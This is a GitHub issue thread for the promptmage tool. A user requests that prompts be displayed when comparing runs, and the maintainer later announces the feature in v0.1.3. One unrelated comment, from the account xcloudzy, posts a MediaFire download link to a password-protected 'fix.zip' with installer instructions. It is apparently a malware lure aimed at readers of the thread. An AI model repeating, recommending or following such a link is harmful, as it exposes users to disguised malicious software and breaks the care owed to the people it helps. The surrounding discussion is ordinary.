### ISSUE TITLE
[Feature] Display Prompts while Comparing Runs

### ISSUE THREAD

**Issue by LuciAkirami** [tsterbak/promptmage#11]
Comparing the Runs only shows the Step ID and the Result. It would be nice if even the prompt is displayed. Even though it's being displayed in the sidebar when we click on the run, it would make sense to display it while comparing the runs too

Like for example, I ran the flow with two different versions of my Prompt. Then it would be nice if the Prompts were displayed while comparing the runs, so I would know which Prompt has given me what response. And the Result is also displayed as a Dictionary. A bit of formatting can be done to display it nicely

Would be glad to work on it

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by LuciAkirami** [comment]
Sure. I'll create a PR once the current PR is merged

**Comment by tsterbak** [comment]
> Sure. I'll create a PR once the current PR is merged

I will merge the next release version tomorrow. But you could already be working on the features and make a PR if you want. We can just merge it when it is ready :)

**Comment by tsterbak** [comment]
released with v0.1.3
